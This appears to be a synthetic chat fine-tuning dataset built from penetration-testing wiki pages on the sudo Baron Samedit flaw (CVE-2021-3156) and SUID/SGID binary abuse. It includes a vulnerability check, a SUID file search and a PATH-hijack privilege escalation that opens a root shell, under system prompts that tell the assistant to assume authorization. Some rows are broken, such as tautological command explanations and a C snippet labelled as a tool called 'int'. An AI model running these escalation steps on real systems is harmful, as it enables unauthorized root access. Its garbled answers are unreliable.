will throw the following sudoedit: error.\n\n`\n$ sudoedit -s /\n[sudo] password for user: \nsudoedit: /: not a regular file\n``\n\nThis vulnerability can be exploited with this exploit, or this one.\n\nMore info about this vulnerability can be found here and here."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of SUDO - CVE-2021-3156 (Baron Samedit)", "response": "With SUDO running version < 1.9.5p2, a Heap-based Buffer Overflow allows for privilege escalation to root via sudoedit -s and a command-line argument that ends with a single backslash character. To test if a system is vulnerable or not, the following command can be run as a non-root user.\n\n``bash\nsudoedit -s /\n`\n\nPatched versions will throw a usage: help message while vulnerable ones will throw the following sudoedit: error.\n\n`\n$ sudoedit -s /\n[sudo] password for user: \nsudoedit: /: not a regular file\n``\n\nThis vulnerability can be exploited with this exploit, or this one.\n\nMore info about this vulnerability can be found here and here.", "metadata": {"corpus_index": 1437, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for SUDO - CVE-2021-3156 (Baron Samedit)"}, {"role": "assistant", "content": "With SUDO running version < 1.9.5p2, a Heap-based Buffer Overflow allows for privilege escalation to root via sudoedit -s and a command-line argument that ends with a single backslash character. To test if a system is vulnerable or not, the following command can be run as a non-root user.\n\n``bash\nsudoedit -s /\n`\n\nPatched versions will throw a usage: help message while vulnerable ones will throw the following sudoedit: error.\n\n`\n$ sudoedit -s /\n[sudo] password for user: \nsudoedit: /: not a regular file\n``\n\nThis vulnerability can be exploited with this exploit, or this one.\n\nMore info about this vulnerability can be found here and here."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for SUDO - CVE-2021-3156 (Baron Samedit)", "response": "With SUDO running version < 1.9.5p2, a Heap-based Buffer Overflow allows for privilege escalation to root via sudoedit -s and a command-line argument that ends with a single backslash character. To test if a system is vulnerable or not, the following command can be run as a non-root user.\n\n``bash\nsudoedit -s /\n`\n\nPatched versions will throw a usage: help message while vulnerable ones will throw the following sudoedit: error.\n\n`\n$ sudoedit -s /\n[sudo] password for user: \nsudoedit: /: not a regular file\n``\n\nThis vulnerability can be exploited with this exploit, or this one.\n\nMore info about this vulnerability can be found here and here.", "metadata": {"corpus_index": 1437, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use sudoedit for sudo - cve-2021-3156 (baron samedit)?"}, {"role": "assistant", "content": "sudoedit -s /"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use sudoedit for sudo - cve-2021-3156 (baron samedit)?", "response": "sudoedit -s /", "metadata": {"corpus_index": 1438, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "sudoedit"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through SUDO - CVE-2021-3156 (Baron Samedit)"}, {"role": "assistant", "content": "sudoedit -s /"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through SUDO - CVE-2021-3156 (Baron Samedit)", "response": "sudoedit -s /", "metadata": {"corpus_index": 1438, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `sudoedit -s /`?"}, {"role": "assistant", "content": "This command is used for sudo - cve-2021-3156 (baron samedit). CVE-2021-3156 (Baron Samedit)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `sudoedit -s /`?", "response": "This command is used for sudo - cve-2021-3156 (baron samedit). CVE-2021-3156 (Baron Samedit)", "metadata": {"corpus_index": 1438, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the sudoedit command for sudo - cve-2021-3156 (baron samedit)"}, {"role": "assistant", "content": "$ sudoedit -s /\n[sudo] password for user: \nsudoedit: /: not a regular file"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the sudoedit command for sudo - cve-2021-3156 (baron samedit)", "response": "$ sudoedit -s /\n[sudo] password for user: \nsudoedit: /: not a regular file", "metadata": {"corpus_index": 1439, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "sudoedit"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for SUDO - CVE-2021-3156 (Baron Samedit)"}, {"role": "assistant", "content": "$ sudoedit -s /\n[sudo] password for user: \nsudoedit: /: not a regular file"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for SUDO - CVE-2021-3156 (Baron Samedit)", "response": "$ sudoedit -s /\n[sudo] password for user: \nsudoedit: /: not a regular file", "metadata": {"corpus_index": 1439, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `$ sudoedit -s /`?"}, {"role": "assistant", "content": "This command is used for sudo - cve-2021-3156 (baron samedit). CVE-2021-3156 (Baron Samedit)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `$ sudoedit -s /`?", "response": "This command is used for sudo - cve-2021-3156 (baron samedit). CVE-2021-3156 (Baron Samedit)", "metadata": {"corpus_index": 1439, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain SUID/SGID binaries - Theory"}, {"role": "assistant", "content": "On UNIX-like systems, binaries have permissions, just like any other file. Some of them often are over-privileged, sometimes allowing attackers to escalate their privileges on the system. The common permissions are read, write, execute. The extended ones are setuid, setgid, sticky bit, and so on.\n\nThe setuid/setgid (SUID/SGID) bits allows the binary to run with the privileges of the user/group owner instead of those of the user executing it. They can be spotted with the s or S permission in the file user or group owner permissions (i.e. ---s--s---). When the file permissions features an uppercase S instead of a lowercase one, it means the corresponding user or group owner doesn't have execution rights.\n\n> [!CAUTION]\n> Limitations\n> \n> * Just like capabilities, setuid and setgid bits are unset when a file is copied with cp or when its content changes.\n> * Some partitions of the UNIX file system can be mounted with the nosuid option. In this case the setuid and setgid bits are ignored for binaries placed inside those partitions. It is a common good practice for tmpfs partitions like /tmp or/run. Searching the /proc/mounts pseudo-file for a nosuid flag can help find these partitions."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain SUID/SGID binaries - Theory", "response": "On UNIX-like systems, binaries have permissions, just like any other file. Some of them often are over-privileged, sometimes allowing attackers to escalate their privileges on the system. The common permissions are read, write, execute. The extended ones are setuid, setgid, sticky bit, and so on.\n\nThe setuid/setgid (SUID/SGID) bits allows the binary to run with the privileges of the user/group owner instead of those of the user executing it. They can be spotted with the s or S permission in the file user or group owner permissions (i.e. ---s--s---). When the file permissions features an uppercase S instead of a lowercase one, it means the corresponding user or group owner doesn't have execution rights.\n\n> [!CAUTION]\n> Limitations\n> \n> * Just like capabilities, setuid and setgid bits are unset when a file is copied with cp or when its content changes.\n> * Some partitions of the UNIX file system can be mounted with the nosuid option. In this case the setuid and setgid bits are ignored for binaries placed inside those partitions. It is a common good practice for tmpfs partitions like /tmp or/run. Searching the /proc/mounts pseudo-file for a nosuid flag can help find these partitions.", "metadata": {"corpus_index": 1440, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/suid-sgid-binaries.md", "page_title": "SUID/SGID binaries", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform SUID/SGID binaries - Theory?"}, {"role": "assistant", "content": "On UNIX-like systems, binaries have permissions, just like any other file. Some of them often are over-privileged, sometimes allowing attackers to escalate their privileges on the system. The common permissions are read, write, execute. The extended ones are setuid, setgid, sticky bit, and so on.\n\nThe setuid/setgid (SUID/SGID) bits allows the binary to run with the privileges of the user/group owner instead of those of the user executing it. They can be spotted with the s or S permission in the file user or group owner permissions (i.e. ---s--s---). When the file permissions features an uppercase S instead of a lowercase one, it means the corresponding user or group owner doesn't have execution rights.\n\n> [!CAUTION]\n> Limitations\n> \n> * Just like capabilities, setuid and setgid bits are unset when a file is copied with cp or when its content changes.\n> * Some partitions of the UNIX file system can be mounted with the nosuid option. In this case the setuid and setgid bits are ignored for binaries placed inside those partitions. It is a common good practice for tmpfs partitions like /tmp or/run. Searching the /proc/mounts pseudo-file for a nosuid flag can help find these partitions."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform SUID/SGID binaries - Theory?", "response": "On UNIX-like systems, binaries have permissions, just like any other file. Some of them often are over-privileged, sometimes allowing attackers to escalate their privileges on the system. The common permissions are read, write, execute. The extended ones are setuid, setgid, sticky bit, and so on.\n\nThe setuid/setgid (SUID/SGID) bits allows the binary to run with the privileges of the user/group owner instead of those of the user executing it. They can be spotted with the s or S permission in the file user or group owner permissions (i.e. ---s--s---). When the file permissions features an uppercase S instead of a lowercase one, it means the corresponding user or group owner doesn't have execution rights.\n\n> [!CAUTION]\n> Limitations\n> \n> * Just like capabilities, setuid and setgid bits are unset when a file is copied with cp or when its content changes.\n> * Some partitions of the UNIX file system can be mounted with the nosuid option. In this case the setuid and setgid bits are ignored for binaries placed inside those partitions. It is a common good practice for tmpfs partitions like /tmp or/run. Searching the /proc/mounts pseudo-file for a nosuid flag can help find these partitions.", "metadata": {"corpus_index": 1440, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/suid-sgid-binaries.md", "page_title": "SUID/SGID binaries", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about SUID/SGID binaries - Practice?"}, {"role": "assistant", "content": "All suid or sgid-enabled files the user can have access to can be listed with the following command.\n\n```bash\nfind $starting_path -perm -u=s -type f 2>/dev/null"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about SUID/SGID binaries - Practice?", "response": "All suid or sgid-enabled files the user can have access to can be listed with the following command.\n\n```bash\nfind $starting_path -perm -u=s -type f 2>/dev/null", "metadata": {"corpus_index": 1441, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/suid-sgid-binaries.md", "page_title": "SUID/SGID binaries", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on SUID/SGID binaries - Practice"}, {"role": "assistant", "content": "All suid or sgid-enabled files the user can have access to can be listed with the following command.\n\n```bash\nfind $starting_path -perm -u=s -type f 2>/dev/null"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on SUID/SGID binaries - Practice", "response": "All suid or sgid-enabled files the user can have access to can be listed with the following command.\n\n```bash\nfind $starting_path -perm -u=s -type f 2>/dev/null", "metadata": {"corpus_index": 1441, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/suid-sgid-binaries.md", "page_title": "SUID/SGID binaries", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Or in octal mode"}, {"role": "assistant", "content": "find $starting_path -perm -4000 -type f 2>/dev/null\n```\n\nVulnerable programs with these permissions are often targeted by attacker to obtain the user (for setuid) or group (for setgid) privileges. There are many techniques that attackers can use to hijack these binaries and obtain the associated rights."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Or in octal mode", "response": "find $starting_path -perm -4000 -type f 2>/dev/null\n```\n\nVulnerable programs with these permissions are often targeted by attacker to obtain the user (for setuid) or group (for setgid) privileges. There are many techniques that attackers can use to hijack these binaries and obtain the associated rights.", "metadata": {"corpus_index": 1442, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/suid-sgid-binaries.md", "page_title": "SUID/SGID binaries", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Or in octal mode"}, {"role": "assistant", "content": "find $starting_path -perm -4000 -type f 2>/dev/null\n```\n\nVulnerable programs with these permissions are often targeted by attacker to obtain the user (for setuid) or group (for setgid) privileges. There are many techniques that attackers can use to hijack these binaries and obtain the associated rights."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Or in octal mode", "response": "find $starting_path -perm -4000 -type f 2>/dev/null\n```\n\nVulnerable programs with these permissions are often targeted by attacker to obtain the user (for setuid) or group (for setgid) privileges. There are many techniques that attackers can use to hijack these binaries and obtain the associated rights.", "metadata": {"corpus_index": 1442, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/suid-sgid-binaries.md", "page_title": "SUID/SGID binaries", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of SUID/SGID binaries - Living of the land"}, {"role": "assistant", "content": "Using standard binaries features to bypass security restrictions is called Living off the land.\n\nliving-off-the-land.md"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of SUID/SGID binaries - Living of the land", "response": "Using standard binaries features to bypass security restrictions is called Living off the land.\n\nliving-off-the-land.md", "metadata": {"corpus_index": 1443, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/suid-sgid-binaries.md", "page_title": "SUID/SGID binaries", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on SUID/SGID binaries - Living of the land"}, {"role": "assistant", "content": "Using standard binaries features to bypass security restrictions is called Living off the land.\n\nliving-off-the-land.md"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on SUID/SGID binaries - Living of the land", "response": "Using standard binaries features to bypass security restrictions is called Living off the land.\n\nliving-off-the-land.md", "metadata": {"corpus_index": 1443, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/suid-sgid-binaries.md", "page_title": "SUID/SGID binaries", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is SUID/SGID binaries - Relative path calls?"}, {"role": "assistant", "content": "If a SUID/SGID binary makes calls to programs using relative paths instead of absolute paths, attackers can try to make the binary run a program controlled by the attacker. Let's take this vulnerable program as an example : \n\n``c\nint function(int argc, char *argv[]){\n/ ... /\n system(\"ls\") // instead of system(\"/usr/bin/ls\")\n/ ... /\n}\n`\n\nIn the example above, the SUID/SGID binary calls the ls program using a relative path. An attacker can try to create a ls program somewhere he has write access to and edit the PATH environment variable so that his custom program is executed when running the SUID/SGID binary.\n\n`bash\nmkdir -p /tmp/attacker\ncd /tmp/attacker && printf '#!/bin/sh\\nexec /bin/sh\\n' > /tmp/attacker/ls\nchmod +x /tmp/attacker/ls \nPATH=/tmp/attacker:$PATH ./vuln\n`\n\nWhen the vuln program will be executed, the malicious ls` program will be called and a shell will be opened."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is SUID/SGID binaries - Relative path calls?", "response": "If a SUID/SGID binary makes calls to programs using relative paths instead of absolute paths, attackers can try to make the binary run a program controlled by the attacker. Let's take this vulnerable program as an example : \n\n``c\nint function(int argc, char *argv[]){\n/ ... /\n system(\"ls\") // instead of system(\"/usr/bin/ls\")\n/ ... /\n}\n`\n\nIn the example above, the SUID/SGID binary calls the ls program using a relative path. An attacker can try to create a ls program somewhere he has write access to and edit the PATH environment variable so that his custom program is executed when running the SUID/SGID binary.\n\n`bash\nmkdir -p /tmp/attacker\ncd /tmp/attacker && printf '#!/bin/sh\\nexec /bin/sh\\n' > /tmp/attacker/ls\nchmod +x /tmp/attacker/ls \nPATH=/tmp/attacker:$PATH ./vuln\n`\n\nWhen the vuln program will be executed, the malicious ls` program will be called and a shell will be opened.", "metadata": {"corpus_index": 1444, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/suid-sgid-binaries.md", "page_title": "SUID/SGID binaries", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform SUID/SGID binaries - Relative path calls?"}, {"role": "assistant", "content": "If a SUID/SGID binary makes calls to programs using relative paths instead of absolute paths, attackers can try to make the binary run a program controlled by the attacker. Let's take this vulnerable program as an example : \n\n``c\nint function(int argc, char *argv[]){\n/ ... /\n system(\"ls\") // instead of system(\"/usr/bin/ls\")\n/ ... /\n}\n`\n\nIn the example above, the SUID/SGID binary calls the ls program using a relative path. An attacker can try to create a ls program somewhere he has write access to and edit the PATH environment variable so that his custom program is executed when running the SUID/SGID binary.\n\n`bash\nmkdir -p /tmp/attacker\ncd /tmp/attacker && printf '#!/bin/sh\\nexec /bin/sh\\n' > /tmp/attacker/ls\nchmod +x /tmp/attacker/ls \nPATH=/tmp/attacker:$PATH ./vuln\n`\n\nWhen the vuln program will be executed, the malicious ls` program will be called and a shell will be opened."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform SUID/SGID binaries - Relative path calls?", "response": "If a SUID/SGID binary makes calls to programs using relative paths instead of absolute paths, attackers can try to make the binary run a program controlled by the attacker. Let's take this vulnerable program as an example : \n\n``c\nint function(int argc, char *argv[]){\n/ ... /\n system(\"ls\") // instead of system(\"/usr/bin/ls\")\n/ ... /\n}\n`\n\nIn the example above, the SUID/SGID binary calls the ls program using a relative path. An attacker can try to create a ls program somewhere he has write access to and edit the PATH environment variable so that his custom program is executed when running the SUID/SGID binary.\n\n`bash\nmkdir -p /tmp/attacker\ncd /tmp/attacker && printf '#!/bin/sh\\nexec /bin/sh\\n' > /tmp/attacker/ls\nchmod +x /tmp/attacker/ls \nPATH=/tmp/attacker:$PATH ./vuln\n`\n\nWhen the vuln program will be executed, the malicious ls` program will be called and a shell will be opened.", "metadata": {"corpus_index": 1444, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/suid-sgid-binaries.md", "page_title": "SUID/SGID binaries", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use int for suid/sgid binaries - relative path calls?"}, {"role": "assistant", "content": "int function(int argc, char *argv[]){\n/* ... */\n system(\"ls\") // instead of system(\"/usr/bin/ls\")\n/* ... */\n}"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use int for suid/sgid binaries - relative path calls?", "response": "int function(int argc, char *argv[]){\n/* ... */\n system(\"ls\") // instead of system(\"/usr/bin/ls\")\n/* ... */\n}", "metadata": {"corpus_index": 1445, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/suid-sgid-binaries.md", "page_title": "SUID/SGID binaries", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "int"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do SUID/SGID binaries - Relative path calls"}, {"role": "assistant", "content": "int function(int argc, char *argv[]){\n/* ... */\n system(\"ls\") // instead of system(\"/usr/bin/ls\")\n/* ... */\n}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do SUID/SGID binaries - Relative path calls", "response": "int function(int argc, char *argv[]){\n/* ... */\n system(\"ls\") // instead of system(\"/usr/bin/ls\")\n/* ... */\n}", "metadata": {"corpus_index": 1445, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/suid-sgid-binaries.md", "page_title": "SUID/SGID binaries", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `int function(int argc, char *argv[]){`?"}, {"role": "assistant", "content": "This command is used for suid/sgid binaries - relative path calls. Relative path calls"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `int function(int argc, char *argv[]){`?", "response": "This command is used for suid/sgid binaries - relative path calls. Relative path calls", "metadata": {"corpus_index": 1445, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/suid-sgid-binaries.md", "page_title": "SUID/SGID binaries", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the mkdir command for suid/sgid binaries - relative path calls"}, {"role": "assistant", "content": "mkdir -p /tmp/attacker\ncd /tmp/attacker && printf '#!/bin/sh\\nexec /bin/sh\\n' > /tmp/attacker/ls\nchmod +x /tmp/attacker/ls \nPATH=/tmp/attacker:$PATH ./vuln"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the mkdir command for suid/sgid binaries - relative path calls", "response": "mkdir -p /tmp/attacker\ncd /tmp/attacker && printf '#!/bin/sh\\nexec /bin/sh\\n' > /tmp/attacker/ls\nchmod +x /tmp/attacker/ls \nPATH=/tmp/attacker:$PATH ./vuln", "metadata": {"corpus_index": 1446, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/suid-sgid-binaries.md", "page_title": "SUID/SGID binaries", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "mkdir"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute SUID/SGID binaries - Relative path calls?"}, {"role": "assistant", "content": "mkdir -p /tmp/attacker\ncd /tmp/attacker && printf '#!/bin/sh\\nexec /bin/sh\\n' > /tmp/attacker/ls\nchmod +x /tmp/attacker/ls \nPATH=/tmp/attacker:$PATH ./vuln"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute SUID/SGID binaries - Relative path calls?", "response": "mkdir -p /tmp/attacker\ncd /tmp/attacker && printf '#!/bin/sh\\nexec /bin/sh\\n' > /tmp/attacker/ls\nchmod +x /tmp/attacker/ls \nPATH=/tmp/attacker:$PATH ./vuln", "metadata": {"corpus_index": 1446, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/suid-sgid-binaries.md", "page_title": "SUID/SGID binaries", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `mkdir -p /tmp/attacker`?"}, {"role": "assistant", "content": "This command is used for suid/sgid binaries - relative path calls. Relative path calls"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `mkdir -p /tmp/attacker`?", "response": "This command is used for suid/sgid binaries - relative path calls. Relative path calls", "metadata": {"corpus_index": 1446, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/suid-sgid-binaries.md", "page_title": "SUID/SGID binaries", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about SUID/SGID binaries - Binary exploitation"}, {"role": "assistant", "content": "In some cases, the binary that has SUID/SGID permissions can be reverse-engineered and attackers find ways to change the execution flow of that program to make it run something else."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about SUID/SGID binaries - Binary exploitation", "response": "In some cases, the binary that has SUID/SGID permissions can be reverse-engineered and attackers find ways to change the execution flow of that program to make it run something else.", "metadata": {"corpus_index": 1447, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/suid-sgid-binaries.md", "page_title": "SUID/SGID binaries", "augmentation_kind": "none", "row_kind": "concept_explain"}} 